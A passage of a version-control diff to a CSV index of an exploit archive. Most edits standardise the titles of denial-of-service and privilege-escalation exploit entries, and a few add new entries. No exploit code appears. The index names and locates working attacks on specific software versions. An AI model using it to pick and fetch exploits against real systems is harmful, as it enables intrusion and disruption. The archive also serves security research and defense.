diff --git a/files.csv b/files.csv index d4c37bf3d..9c33c0b4a 100644 --- a/files.csv +++ b/files.csv @@ -288,7 +288,7 @@ id,file,description,date,author,platform,type,port 1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0 1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0 -1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service",2006-02-28,"Evgeny Legerov",bsd,dos,0 +1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service)",2006-02-28,"Evgeny Legerov",bsd,dos,0 1551,platforms/hardware/dos/1551.txt,"Multiple Routers - (IRC Request) Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0 1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos,0 1557,platforms/windows/dos/1557.c,"Freeciv 2.0.7 - (Jumbo Malloc) Crash (Denial of Service)",2006-03-06,"Luigi Auriemma",windows,dos,0 @@ -403,7 +403,7 @@ id,file,description,date,author,platform,type,port 2597,platforms/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 2625,platforms/windows/dos/2625.c,"QK SMTP 3.01 - (RCPT TO) Remote Denial of Service",2006-10-23,"Greg Linares",windows,dos,0 2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer - (ADODB Execute) Denial of Service (PoC)",2006-10-24,"YAG KOHHA",windows,dos,0 -2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0 +2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 /dev/crypto - Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0 2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x - (RCPT TO) Remote Denial of Service",2006-10-25,"Greg Linares",windows,dos,0 2672,platforms/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0 2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0 @@ -706,7 +706,7 @@ id,file,description,date,author,platform,type,port 5225,platforms/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll' 'SetUninstallName()' Heap Overflow (PoC)",2008-03-10,void,windows,dos,0 5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 5235,platforms/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial of Service",2008-03-11,ryujin,windows,dos,0 -5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0 +5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - 'rpc.metad' Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0 5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0 5270,platforms/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service",2008-03-17,0in,windows,dos,0 @@ -756,8 +756,8 @@ id,file,description,date,author,platform,type,port 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0 6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0 -6120,platforms/minix/dos/6120.txt,"Minix 3.1.2a - tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0 -6129,platforms/minix/dos/6129.txt,"Minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 +6120,platforms/minix/dos/6120.txt,"Minix 3.1.2a - Local TTY Panic (Denial of Service)",2008-07-23,kokanin,minix,dos,0 +6129,platforms/minix/dos/6129.txt,"Minix 3.1.2a - Remote TTY Panic (Denial of Service)",2008-07-25,kokanin,minix,dos,0 6174,platforms/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - Malformed Archive Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0 6181,platforms/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote Denial of Service Crash (PoC)",2008-08-01,beford,windows,dos,0 6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 - Remote Reboot (Denial of Service)",2008-08-03,crit3rion,hardware,dos,0 @@ -849,7 +849,7 @@ id,file,description,date,author,platform,type,port 7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,hardware,dos,0 7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0 7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - 'URL Protocol' Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0 -7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0 +7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic (Denial of Service)",2008-11-11,"Andrea Bittau",linux,dos,0 7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - 'Community' Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos,0 7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos,0 7109,platforms/windows/dos/7109.txt,"Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service",2008-11-13,"Hamid Ebadi",windows,dos,0 @@ -917,7 +917,7 @@ id,file,description,date,author,platform,type,port 7799,platforms/windows/dos/7799.pl,"Novell Netware 6.5 - (ICEbrowser) Remote System Denial of Service",2009-01-16,"Jeremy Brown",windows,dos,0 7812,platforms/multiple/dos/7812.pl,"MPlayer 1.0rc2 - TwinVQ Stack Buffer Overflow (PoC)",2009-01-16,sCORPINo,multiple,dos,0 7822,platforms/multiple/dos/7822.c,"D-Bus Daemon < 1.2.4 - (libdbus) Denial of Service",2009-01-19,"Jon Oberheide",multiple,dos,0 -7823,platforms/qnx/dos/7823.txt,"QNX 6.4.0 - bitflipped elf binary 'id' Kernel Panic Exploit",2009-01-19,kokanin,qnx,dos,0 +7823,platforms/qnx/dos/7823.txt,"QNX 6.4.0 - bitflipped ELF Binary 'id' Kernel Panic (Denial of Service)",2009-01-19,kokanin,qnx,dos,0 7852,platforms/windows/dos/7852.pl,"FTPShell Server 4.3 - (licence key) Remote Buffer Overflow (PoC)",2009-01-22,LiquidWorm,windows,dos,0 7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 - '.m3u' Local Buffer Overflow (PoC)",2009-01-25,AlpHaNiX,windows,dos,0 7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)",2009-01-25,Houssamix,windows,dos,0 @@ -969,7 +969,7 @@ id,file,description,date,author,platform,type,port 8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - '.pls' Local Buffer Overflow (PoC) (SEH)",2009-03-18,zAx,windows,dos,0 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service",2009-03-19,"Juan Galiana Lara",multiple,dos,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0 -8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 +8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - Dumping Environment Local Kernel Panic (Denial of Service)",2009-03-23,kokanin,freebsd,dos,0 8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX Router - Remote Denial of Service",2009-03-23,Benkei,hardware,dos,0 8262,platforms/osx/dos/8262.c,"Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)",2009-03-23,mu-b,osx,dos,0 8263,platforms/osx/dos/8263.c,"Apple Mac OSX xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0 @@ -1425,7 +1425,7 @@ id,file,description,date,author,platform,type,port 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit",2010-03-07,l3D,windows,dos,0 11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - 'argument' Local Crash",2010-03-09,l3D,windows,dos,0 11670,platforms/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0 -11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 +11705,platforms/multiple/dos/11705.c,"FreeBSD / OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0 11714,platforms/windows/dos/11714.py,"Mackeitone Media Player - '.m3u' Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0 11717,platforms/multiple/dos/11717.php,"Multiple PHP Functions - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 @@ -1919,7 +1919,7 @@ id,file,description,date,author,platform,type,port 16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 Slideshow - '.jpg' Local Crash (PoC)",2011-03-08,KedAns-Dz,windows,dos,0 16944,platforms/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor - '.avi' Local Crash (PoC)",2011-03-08,KedAns-Dz,windows,dos,0 16945,platforms/hardware/dos/16945.pl,"Nokia N97 - '.m3u' Playlist Crash (PoC)",2011-03-08,KedAns-Dz,hardware,dos,0 -16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic Denial of Service (2)",2011-03-10,zx2c4,linux,dos,0 +16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)",2011-03-10,zx2c4,linux,dos,0 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,linux,dos,0 16966,platforms/linux/dos/16966.php,"PHP 5.3.6 - 'shmop_read()' Integer Overflow Denial of Service",2011-03-12,"Jose Carlos Norte",linux,dos,0 16973,platforms/linux/dos/16973.c,"Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0 @@ -2040,14 +2040,14 @@ id,file,description,date,author,platform,type,port 17889,platforms/windows/dos/17889.txt,"Sterling Trader 7.0.2 - Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos,0 17890,platforms/windows/dos/17890.c,"GMER 1.0.15.15641 - MFT Overwrite",2011-09-26,Heurs,windows,dos,0 17896,platforms/windows/dos/17896.txt,"PcVue 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 -17901,platforms/osx/dos/17901.c,"Apple Mac OSX < 10.6.7 - Kernel Panic",2011-09-28,hkpco,osx,dos,0 +17901,platforms/osx/dos/17901.c,"Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service)",2011-09-28,hkpco,osx,dos,0 17903,platforms/windows/dos/17903.txt,"NCSS 07.1.21 - Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 17908,platforms/freebsd/dos/17908.sh,"FreeBSD - UIPC socket heap Overflow (PoC)",2011-09-30,"Shaun Colley",freebsd,dos,0 17918,platforms/windows/dos/17918.txt,"Adobe Photoshop Elements 8.0 - Multiple Arbitrary Code Execution Vulnerabilities",2011-10-02,LiquidWorm,windows,dos,0 17928,platforms/windows/dos/17928.pl,"Ashampoo Burning Studio Elements 10.0.9 - '.ashprj' Heap Overflow",2011-10-04,LiquidWorm,windows,dos,0 17929,platforms/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 - '.pdf' File Handling Memory Corruption",2011-10-04,"Mario Gomes",windows,dos,0 17930,platforms/windows/dos/17930.txt,"Cytel Studio 9.0.0 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 -17931,platforms/windows/dos/17931.txt,"genstat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 +17931,platforms/windows/dos/17931.txt,"GenStat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17933,platforms/windows/dos/17933.html,"DivX Plus Web Player - 'file://' Buffer Overflow (PoC)",2011-10-05,Snake,windows,dos,0 17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0 17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 - Use-After-Free",2011-10-10,"Luigi Auriemma",windows,dos,0 @@ -2237,6 +2237,7 @@ id,file,description,date,author,platform,type,port 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0 +19130,platforms/freebsd/dos/19130.c,"FreeBSD 3.0 - UNIX-domain Panic (Denial of Service)",1999-05-05,"Lukasz Luzar",freebsd,dos,0 19137,platforms/hardware/dos/19137.rb,"Wyse - Unauthenticated Machine Remote Power Off (Denial of Service) (Metasploit)",2012-06-14,it.solunium,hardware,dos,0 19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 @@ -2305,6 +2306,7 @@ id,file,description,date,author,platform,type,port 19488,platforms/bsd/dos/19488.c,"FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - 'setsockopt()' Denial of Service",1999-09-05,"L. Sassaman",bsd,dos,0 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 - DCOM Server",1999-09-08,Mnemonix,windows,dos,0 19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0 +19507,platforms/solaris/dos/19507.txt,"Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service)",1999-09-23,"David Brumley",solaris,dos,0 19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",hardware,dos,0 19536,platforms/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi Exploit",1996-12-10,"Josh Richards",multiple,dos,0 19541,platforms/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",novell,dos,0 @@ -2744,7 +2746,7 @@ id,file,description,date,author,platform,type,port 22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos,0 22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 -22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 +22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic (Denial of Service)",2002-11-07,shibby,osx,dos,0 22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 @@ -4376,7 +4378,7 @@ id,file,description,date,author,platform,type,port 34980,platforms/novell/dos/34980.py,"Novell Groupwise 8.0 - Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",novell,dos,0 35013,platforms/linux/dos/35013.c,"Linux Kernel 2.6.x - 'inotify_init()' Memory Leak Local Denial of Service",2010-11-24,"Vegard Nossum",linux,dos,0 35000,platforms/windows/dos/35000.txt,"SAP NetWeaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",windows,dos,3200 -35058,platforms/bsd/dos/35058.c,"OpenBSD 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 +35058,platforms/bsd/dos/35058.c,"OpenBSD 5.5 - Local Kernel Panic (Denial of Service)",2014-10-25,nitr0us,bsd,dos,0 40099,platforms/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (5)",2016-07-13,COSIG,multiple,dos,0 40100,platforms/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (6)",2016-07-13,COSIG,multiple,dos,0 40101,platforms/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (7)",2016-07-13,COSIG,multiple,dos,0 @@ -4528,6 +4530,7 @@ id,file,description,date,author,platform,type,port 36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In '.DOCX' File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0 36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial of Service",2011-12-18,anonymous,php,dos,0 +36799,platforms/bsd/dos/36799.c,"OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)",2015-04-21,nitr0us,bsd,dos,0 36814,platforms/osx/dos/36814.c,"Apple Mac OSX - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80 36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0 @@ -5057,7 +5060,7 @@ id,file,description,date,author,platform,type,port 39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 -39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 +39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 Kernel (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0 39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0 39602,platforms/windows/dos/39602.txt,"Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks",2016-03-23,"Google Security Research",windows,dos,0 @@ -5675,7 +5678,7 @@ id,file,description,date,author,platform,type,port 42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - win32k.sys .TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0 -42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - .win32k.sys TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0 +42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - win32k.sys .TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0 42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0 @@ -5697,10 +5700,11 @@ id,file,description,date,author,platform,type,port 42944,platforms/multiple/dos/42944.py,"Dnsmasq < 2.78 - Information Leak",2017-10-02,"Google Security Research",multiple,dos,0 42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0 42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0 +42955,platforms/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 -15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0 +15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService 'PATH' Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0 29,platforms/bsd/local/29.c,"Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Privilege Escalation",2003-05-12,bob,bsd,local,0 31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0 @@ -5854,7 +5858,7 @@ id,file,description,date,author,platform,type,port 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0 715,platforms/solaris/local/715.c,"Solaris 8/9 passwd - 'circ()' Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 718,platforms/linux/local/718.c,"Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0 -739,platforms/bsd/local/739.c,"FreeBSD TOP - Format String",2001-07-23,truefinder,bsd,local,0 +739,platforms/bsd/local/739.c,"FreeBSD /usr/bin/top - Format String",2001-07-23,truefinder,bsd,local,0 741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0 744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0 749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0 @@ -5957,7 +5961,7 @@ id,file,description,date,author,platform,type,port 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0 1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation",2005-09-14,Qnix,linux,local,0 1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation",2005-09-24,kingcope,linux,local,0 -1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - (poppassd) Privilege Escalation",2005-09-24,kingcope,bsd,local,0 +1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - Privilege Escalation",2005-09-24,kingcope,bsd,local,0 1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0 1267,platforms/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0 1297,platforms/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 (and Gateway < 2.16) - Privilege Escalation",2005-11-07,"Xavier de Leon",linux,local,0 @@ -6286,7 +6290,7 @@ id,file,description,date,author,platform,type,port 7006,platforms/windows/local/7006.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (2)",2008-11-05,"Debasis Mohanty",windows,local,0 7051,platforms/windows/local/7051.pl,"VideoLAN VLC Media Player < 0.9.6 - '.rt' Stack Buffer Overflow",2008-11-07,SkD,windows,local,0 7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - 'AKEProtect.sys' Privilege Escalation",2008-11-07,"NT Internals",windows,local,0 -7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0 +7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - 'Defaults SetEnv' Privilege Escalation",2008-11-15,kingcope,multiple,local,0 7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit",2008-11-20,SecurityReason,multiple,local,0 7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0 @@ -6624,7 +6628,7 @@ id,file,description,date,author,platform,type,port 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Buffer 